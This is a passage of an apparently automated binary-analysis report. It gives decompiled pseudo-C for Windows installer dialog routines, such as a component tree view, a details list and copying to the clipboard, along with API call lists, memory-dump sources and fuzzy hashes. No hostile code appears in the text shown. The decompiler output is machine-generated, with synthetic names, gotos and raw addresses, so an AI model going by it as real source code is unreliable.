                                                					if(( *0x42eb78 & 0x00000002) != 0) {
                                                						 *0x42e330 = _t149;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E00403D12( *0x42e328);
                                                				}
                                                				_t158 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                				if(( *0x42eb78 & 0x00000004) != 0) {
                                                					SendMessageA(_t158, 0x409, _t149, _a12);
                                                					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                				}
                                                				goto L37;
                                                			}



































                                                APIs
                                                • GetDlgItem.USER32 ref: 00404E66
                                                • GetDlgItem.USER32 ref: 00404E75
                                                • GetClientRect.USER32 ref: 00404EB2
                                                • GetSystemMetrics.USER32 ref: 00404EBA
                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                                                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                                                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                                • ShowWindow.USER32(?,00000008), ref: 00404F56
                                                • GetDlgItem.USER32 ref: 00404F77
                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                                                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                                                • GetDlgItem.USER32 ref: 00404E84
                                                  • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                                                • GetDlgItem.USER32 ref: 00404FC9
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004D9B,00000000), ref: 00404FD7
                                                • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                                • ShowWindow.USER32(00000000), ref: 00405002
                                                • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                                • ShowWindow.USER32(00000008), ref: 0040504E
                                                • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                                                • CreatePopupMenu.USER32 ref: 00405091
                                                • AppendMenuA.USER32 ref: 004050A6
                                                • GetWindowRect.USER32 ref: 004050B9
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                                                • OpenClipboard.USER32(00000000), ref: 00405128
                                                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                                • GlobalLock.KERNEL32 ref: 00405141
                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405178
                                                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040517E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                                • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				void* _v24;
                                                				long _v28;
                                                				int _v32;
                                                				signed int _v40;
                                                				int _v44;
                                                				signed int* _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				long _v68;
                                                				void* _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t182;
                                                				intOrPtr _t183;
                                                				int _t189;
                                                				int _t196;
                                                				intOrPtr _t198;
                                                				long _t202;
                                                				signed int _t206;
                                                				signed int _t217;
                                                				void* _t220;
                                                				void* _t221;
                                                				int _t227;
                                                				intOrPtr _t231;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t240;
                                                				signed int _t242;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				struct HBITMAP__* _t250;
                                                				void* _t252;
                                                				char* _t268;
                                                				signed char _t269;
                                                				long _t274;
                                                				int _t280;
                                                				signed int* _t281;
                                                				int _t282;
                                                				long _t283;
                                                				signed int* _t284;
                                                				int _t285;
                                                				long _t286;
                                                				signed int _t287;
                                                				long _t288;
                                                				signed int _t291;
                                                				int _t294;
                                                				signed int _t298;
                                                				signed int _t300;
                                                				signed int _t302;
                                                				intOrPtr _t309;
                                                				int* _t310;
                                                				void* _t311;
                                                				int _t315;
                                                				int _t316;
                                                				int _t317;
                                                				signed int _t318;
                                                				void* _t320;
                                                				void* _t328;
                                                				void* _t331;
                                                
                                                				_v12 = GetDlgItem(_a4, 0x3f9);
                                                				_t182 = GetDlgItem(_a4, 0x408);
                                                				_t280 =  *0x42eb88; // 0x5714fc
                                                				_t320 = SendMessageA;
                                                				_v8 = _t182;
                                                				_t183 =  *0x42eb70; // 0x571350
                                                				_t315 = 0;
                                                				_v32 = _t280;
                                                				_v20 = _t183 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					__eflags = _a8 - 0x405;
                                                					if(_a8 != 0x405) {
                                                						_t289 = _a16;
                                                					} else {
                                                						_a12 = _t315;
                                                						_t289 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					__eflags = _a8 - 0x4e;
                                                					if(_a8 == 0x4e) {
                                                						L28:
                                                						__eflags = _a8 - 0x413;
                                                						_v16 = _t289;
                                                						if(_a8 == 0x413) {
                                                							L30:
                                                							__eflags =  *0x42eb79 & 0x00000002;
                                                							if(( *0x42eb79 & 0x00000002) != 0) {
                                                								L41:
                                                								__eflags = _v16 - _t315;
                                                								if(_v16 != _t315) {
                                                									_t232 = _v16;
                                                									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                									}
                                                									_t233 = _v16;
                                                									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                											 *_t284 =  *_t284 & 0xffffffdf;
                                                											__eflags =  *_t284;
                                                										} else {
                                                											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							__eflags = _a8 - 0x413;
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								__eflags = _a8 - 0x413;
                                                								_t289 = 0 | _a8 != 0x00000413;
                                                								_t240 = E00404598(_v8, _a8 != 0x413);
                                                								__eflags = _t240 - _t315;
                                                								if(_t240 >= _t315) {
                                                									_t93 = _t280 + 8; // 0x8
                                                									_t310 = _t240 * 0x418 + _t93;
                                                									_t289 =  *_t310;
                                                									__eflags = _t289 & 0x00000010;
                                                									if((_t289 & 0x00000010) == 0) {
                                                										__eflags = _t289 & 0x00000040;
                                                										if((_t289 & 0x00000040) == 0) {
                                                											_t298 = _t289 ^ 0x00000001;
                                                											__eflags = _t298;
                                                										} else {
                                                											_t300 = _t289 ^ 0x00000080;
                                                											__eflags = _t300;
                                                											if(_t300 >= 0) {
                                                												_t298 = _t300 & 0xfffffffe;
                                                											} else {
                                                												_t298 = _t300 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t310 = _t298;
                                                										E0040117D(_t240);
                                                										_t242 =  *0x42eb78; // 0x80
                                                										_t289 = 1;
                                                										_a8 = 0x40f;
                                                										_t245 =  !_t242 >> 0x00000008 & 1;
                                                										__eflags = _t245;
                                                										_a12 = 1;
                                                										_a16 = _t245;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t289 = _a16;
                                                							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                							goto L48;
                                                						}
                                                						goto L30;
                                                					} else {
                                                						__eflags = _a8 - 0x413;
                                                						if(_a8 != 0x413) {
                                                							L48:
                                                							__eflags = _a8 - 0x111;
                                                							if(_a8 != 0x111) {
                                                								L56:
                                                								__eflags = _a8 - 0x200;
                                                								if(_a8 == 0x200) {
                                                									SendMessageA(_v8, 0x200, _t315, _t315);
                                                								}
                                                								__eflags = _a8 - 0x40b;
                                                								if(_a8 == 0x40b) {
                                                									_t220 =  *0x429fb4;
                                                									__eflags = _t220 - _t315;
                                                									if(_t220 != _t315) {
                                                										ImageList_Destroy(_t220);
                                                									}
                                                									_t221 =  *0x429fcc;
                                                									__eflags = _t221 - _t315;
                                                									if(_t221 != _t315) {
                                                										GlobalFree(_t221);
                                                									}
                                                									 *0x429fb4 = _t315;
                                                									 *0x429fcc = _t315;
                                                									 *0x42ebc0 = _t315;
                                                								}
                                                								__eflags = _a8 - 0x40f;
                                                								if(_a8 != 0x40f) {
                                                									L86:
                                                									__eflags = _a8 - 0x420;
                                                									if(_a8 == 0x420) {
                                                										__eflags =  *0x42eb79 & 0x00000001;
                                                										if(( *0x42eb79 & 0x00000001) != 0) {
                                                											__eflags = _a16 - 0x20;
                                                											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                											__eflags = _t189;
                                                											_t316 = _t189;
                                                											ShowWindow(_v8, _t316);
                                                											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                										}
                                                									}
                                                									goto L89;
                                                								} else {
                                                									E004011EF(_t289, _t315, _t315);
                                                									__eflags = _a12 - _t315;
                                                									if(_a12 != _t315) {
                                                										E0040140B(8);
                                                									}
                                                									__eflags = _a16 - _t315;
                                                									if(_a16 == _t315) {
                                                										L73:
                                                										E004011EF(_t289, _t315, _t315);
                                                										__eflags =  *0x42eb8c - _t315; // 0x2
                                                										_v32 =  *0x429fcc;
                                                										_t196 =  *0x42eb88; // 0x5714fc
                                                										_v60 = 0xf030;
                                                										_v16 = _t315;
                                                										if(__eflags <= 0) {
                                                											L84:
                                                											InvalidateRect(_v8, _t315, 1);
                                                											_t198 =  *0x42e33c; // 0x5770b8
                                                											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
                                                											}
                                                											goto L86;
                                                										} else {
                                                											_t142 = _t196 + 8; // 0x571504
                                                											_t281 = _t142;
                                                											do {
                                                												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                												__eflags = _t202 - _t315;
                                                												if(_t202 != _t315) {
                                                													_t291 =  *_t281;
                                                													_v68 = _t202;
                                                													__eflags = _t291 & 0x00000001;
                                                													_v72 = 8;
                                                													if((_t291 & 0x00000001) != 0) {
                                                														_t151 =  &(_t281[4]); // 0x571514
                                                														_v72 = 9;
                                                														_v56 = _t151;
                                                														_t154 =  &(_t281[0]);
                                                														 *_t154 = _t281[0] & 0x000000fe;
                                                														__eflags =  *_t154;
                                                													}
                                                													__eflags = _t291 & 0x00000040;
                                                													if((_t291 & 0x00000040) == 0) {
                                                														_t206 = (_t291 & 0x00000001) + 1;
                                                														__eflags = _t291 & 0x00000010;
                                                														if((_t291 & 0x00000010) != 0) {
                                                															_t206 = _t206 + 3;
                                                															__eflags = _t206;
                                                														}
                                                													} else {
                                                														_t206 = 3;
                                                													}
                                                													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                													__eflags = _t294;
                                                													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                												}
                                                												_v16 = _v16 + 1;
                                                												_t281 =  &(_t281[0x106]);
                                                												__eflags = _v16 -  *0x42eb8c; // 0x2
                                                											} while (__eflags < 0);
                                                											goto L84;
                                                										}
                                                									} else {
                                                										_t282 = E004012E2( *0x429fcc);
                                                										E00401299(_t282);
                                                										_t217 = 0;
                                                										_t289 = 0;
                                                										__eflags = _t282 - _t315;
                                                										if(_t282 <= _t315) {
                                                											L72:
                                                											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                											_a16 = _t282;
                                                											_a8 = 0x420;
                                                											goto L73;
                                                										} else {
                                                											goto L69;
                                                										}
                                                										do {
                                                											L69:
                                                											_t309 = _v20;
                                                											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                												_t289 = _t289 + 1;
                                                												__eflags = _t289;
                                                											}
                                                											_t217 = _t217 + 1;
                                                											__eflags = _t217 - _t282;
                                                										} while (_t217 < _t282);
                                                										goto L72;
                                                									}
                                                								}
                                                							}
                                                							__eflags = _a12 - 0x3f9;
                                                							if(_a12 != 0x3f9) {
                                                								goto L89;
                                                							}
                                                							__eflags = _a12 >> 0x10 - 1;
                                                							if(_a12 >> 0x10 != 1) {
                                                								goto L89;
                                                							}
                                                							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                							__eflags = _t227 - 0xffffffff;
                                                							if(_t227 == 0xffffffff) {
                                                								goto L89;
                                                							}
                                                							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                							__eflags = _t283 - 0xffffffff;
                                                							if(_t283 == 0xffffffff) {
                                                								L54:
                                                								_t283 = 0x20;
                                                								L55:
                                                								E00401299(_t283);
                                                								SendMessageA(_a4, 0x420, _t315, _t283);
                                                								_a12 = 1;
                                                								_a16 = _t315;
                                                								_a8 = 0x40f;
                                                								goto L56;
                                                							}
                                                							_t231 = _v20;
                                                							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                								goto L55;
                                                							}
                                                							goto L54;
                                                						}
                                                						goto L28;
                                                					}
                                                				} else {
                                                					 *0x42ebc0 = _a4;
                                                					_t247 =  *0x42eb8c; // 0x2
                                                					_t285 = 2;
                                                					_v28 = 0;
                                                					_v16 = _t285;
                                                					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
                                                					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
                                                					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
                                                					_v24 = _t250;
                                                					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
                                                					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x429fb4 = _t252;
                                                					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
                                                					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_v24);
                                                					_t286 = 0;
                                                					do {
                                                						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                							if(_t286 != 0x20) {
                                                								_v16 = _t315;
                                                							}
                                                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                						}
                                                						_t286 = _t286 + 1;
                                                					} while (_t286 < 0x21);
                                                					_t317 = _a16;
                                                					_t287 = _v16;
                                                					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                					_push(0x15);
                                                					E00403CDD(_a4);
                                                					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                					_push(0x16);
                                                					E00403CDD(_a4);
                                                					_t318 = 0;
                                                					_t288 = 0;
                                                					_t328 =  *0x42eb8c - _t318; // 0x2
                                                					if(_t328 <= 0) {
                                                						L19:
                                                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t311 = _v32 + 8;
                                                						_v24 = _t311;
                                                						do {
                                                							_t268 = _t311 + 0x10;
                                                							if( *_t268 != 0) {
                                                								_v60 = _t268;
                                                								_t269 =  *_t311;
                                                								_t302 = 0x20;
                                                								_v84 = _t288;
                                                								_v80 = 0xffff0002;
                                                								_v76 = 0xd;
                                                								_v64 = _t302;
                                                								_v40 = _t318;
                                                								_v68 = _t269 & _t302;
                                                								if((_t269 & 0x00000002) == 0) {
                                                									__eflags = _t269 & 0x00000004;
                                                									if((_t269 & 0x00000004) == 0) {
                                                										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                									} else {
                                                										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                									}
                                                								} else {
                                                									_v76 = 0x4d;
                                                									_v44 = 1;
                                                									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                									_v28 = 1;
                                                									 *( *0x429fcc + _t318 * 4) = _t274;
                                                									_t288 =  *( *0x429fcc + _t318 * 4);
                                                								}
                                                							}
                                                							_t318 = _t318 + 1;
                                                							_t311 = _v24 + 0x418;
                                                							_t331 = _t318 -  *0x42eb8c; // 0x2
                                                							_v24 = _t311;
                                                						} while (_t331 < 0);
                                                						if(_v28 != 0) {
                                                							L20:
                                                							if(_v16 != 0) {
                                                								E00403D12(_v8);
                                                								_t280 = _v32;
                                                								_t315 = 0;
                                                								__eflags = 0;
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E00403D12(_v12);
                                                								L89:
                                                								return E00403D44(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                 			}
                                                0x00404af7
                                                0x00404afa
                                                0x00404b9c
                                                0x00404ba2
                                                0x00404ba8
                                                0x00404bad
                                                0x00404bb0
                                                0x00404bc1
                                                0x00404bc1
                                                0x00000000
                                                0x00404b00
                                                0x00404b00
                                                0x00404b00
                                                0x00404b03
                                                0x00404b09
                                                0x00404b0c
                                                0x00404b0e
                                                0x00404b10
                                                0x00404b12
                                                0x00404b15
                                                0x00404b18
                                                0x00404b1f
                                                0x00404b21
                                                0x00404b24
                                                0x00404b2b
                                                0x00404b2e
                                                0x00404b2e
                                                0x00404b2e
                                                0x00404b2e
                                                0x00404b32
                                                0x00404b35
                                                0x00404b41
                                                0x00404b42
                                                0x00404b45
                                                0x00404b47
                                                0x00404b47
                                                0x00404b47
                                                0x00404b37
                                                0x00404b39
                                                0x00404b39
                                                0x00404b66
                                                0x00404b66
                                                0x00404b67
                                                0x00404b73
                                                0x00404b82
                                                0x00404b82
                                                0x00404b84
                                                0x00404b87
                                                0x00404b90
                                                0x00404b90
                                                0x00000000
                                                0x00404b03
                                                0x00404a97
                                                0x00404aa2
                                                0x00404aa5
                                                0x00404aaa
                                                0x00404aac
                                                0x00404aae
                                                0x00404ab0
                                                0x00404ac0
                                                0x00404aca
                                                0x00404acc
                                                0x00404acf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404ab2
                                                0x00404ab2
                                                0x00404ab2
                                                0x00404ab5
                                                0x00404ab8
                                                0x00404aba
                                                0x00404aba
                                                0x00404aba
                                                0x00404abb
                                                0x00404abc
                                                0x00404abc
                                                0x00000000
                                                0x00404ab2
                                                0x00404a95
                                                0x00404a79
                                                0x004049b0
                                                0x004049b6
                                                0x00000000
                                                0x00000000
                                                0x004049c2
                                                0x004049c6
                                                0x00000000
                                                0x00000000
                                                0x004049d6
                                                0x004049d8
                                                0x004049db
                                                0x00000000
                                                0x00000000
                                                0x004049ed
                                                0x004049ef
                                                0x004049f2
                                                0x004049fc
                                                0x004049fe
                                                0x004049ff
                                                0x00404a00
                                                0x00404a0f
                                                0x00404a11
                                                0x00404a18
                                                0x00404a1b
                                                0x00000000
                                                0x00404a1b
                                                0x004049f4
                                                0x004049f7
                                                0x004049fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004049fa
                                                0x00000000
                                                0x004048ba
                                                0x0040466c
                                                0x00404671
                                                0x00404676
                                                0x0040467b
                                                0x0040467c
                                                0x00404685
                                                0x00404690
                                                0x0040469b
                                                0x004046a1
                                                0x004046af
                                                0x004046c4
                                                0x004046c9
                                                0x004046d4
                                                0x004046dd
                                                0x004046f2
                                                0x00404703
                                                0x00404710
                                                0x00404710
                                                0x00404715
                                                0x0040471b
                                                0x0040471d
                                                0x00404720
                                                0x00404725
                                                0x0040472a
                                                0x0040472c
                                                0x0040472c
                                                0x0040474c
                                                0x0040474c
                                                0x0040474e
                                                0x0040474f
                                                0x00404754
                                                0x00404757
                                                0x0040475a
                                                0x0040475e
                                                0x00404763
                                                0x00404768
                                                0x0040476c
                                                0x00404771
                                                0x00404776
                                                0x00404778
                                                0x0040477a
                                                0x00404780
                                                0x0040484a
                                                0x0040485d
                                                0x00000000
                                                0x00404786
                                                0x00404789
                                                0x0040478c
                                                0x0040478f
                                                0x0040478f
                                                0x00404795
                                                0x0040479b
                                                0x0040479e
                                                0x004047a4
                                                0x004047a5
                                                0x004047aa
                                                0x004047b3
                                                0x004047ba
                                                0x004047bd
                                                0x004047c0
                                                0x004047c3
                                                0x004047fd
                                                0x004047ff
                                                0x00404828
                                                0x00404801
                                                0x0040480e
                                                0x0040480e
                                                0x004047c5
                                                0x004047c8
                                                0x004047d7
                                                0x004047e1
                                                0x004047e9
                                                0x004047f0
                                                0x004047f8
                                                0x004047f8
                                                0x004047c3
                                                0x0040482e
                                                0x0040482f
                                                0x00404835
                                                0x0040483b
                                                0x0040483b
                                                0x00404848
                                                0x00404863
                                                0x00404867
                                                0x00404884
                                                0x00404889
                                                0x0040488c
                                                0x0040488c
                                                0x00000000
                                                0x00404869
                                                0x0040486e
                                                0x00404877
                                                0x00404c04
                                                0x00404c16
                                                0x00404c16
                                                0x00404867
                                                0x00000000
                                                0x00404848
                                                0x00404780

                                                APIs
                                                • GetDlgItem.USER32 ref: 0040462F
                                                • GetDlgItem.USER32 ref: 0040463C
                                                • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404688
                                                • LoadBitmapA.USER32 ref: 0040469B
                                                • SetWindowLongA.USER32 ref: 004046B5
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                                                • DeleteObject.GDI32(?), ref: 00404715
                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                                                • GetWindowLongA.USER32 ref: 0040484F
                                                • SetWindowLongA.USER32 ref: 0040485D
                                                • ShowWindow.USER32(?,00000005), ref: 0040486E
                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                                                • GlobalFree.KERNEL32 ref: 00404A5A
                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                                                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                                                • ShowWindow.USER32(?,00000000), ref: 00404BF0
                                                • GetDlgItem.USER32 ref: 00404BFB
                                                • ShowWindow.USER32(00000000), ref: 00404C02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                                • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				long _v20;
                                                				char _v24;
                                                				long _v28;
                                                				char _v32;
                                                				intOrPtr _v36;
                                                				long _v40;
                                                				signed int _v44;
                                                				CHAR* _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				CHAR* _v68;
                                                				void _v72;
                                                				char _v76;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t81;
                                                				long _t86;
                                                				signed char* _t88;
                                                				void* _t94;
                                                				signed int _t95;
                                                				signed short _t113;
                                                				signed int _t117;
                                                				char* _t122;
                                                				intOrPtr _t124;
                                                				intOrPtr* _t138;
                                                				signed int* _t145;
                                                				intOrPtr _t147;
                                                				signed int _t148;
                                                				signed int _t153;
                                                				struct HWND__* _t159;
                                                				CHAR* _t162;
                                                				int _t163;
                                                
                                                				_t81 =  *0x4297a8;
                                                				_v36 = _t81;
                                                				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
                                                				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E004051D0(0x3fb, _t162);
                                                					E00405B89(_t162);
                                                				}
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E004051D0(0x3fb, _t162);
                                                							if(E004054FF(_t180, _t162) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E0040592B(0x428fa0, _t162);
                                                							_t145 = 0;
                                                							_t86 = E00405C49(0);
                                                							_v16 = _t86;
                                                							if(_t86 == 0) {
                                                								L31:
                                                								E0040592B(0x428fa0, _t162);
                                                								_t88 = E004054B2(0x428fa0);
                                                								if(_t88 != _t145) {
                                                									 *_t88 =  *_t88 & 0x00000000;
                                                								}
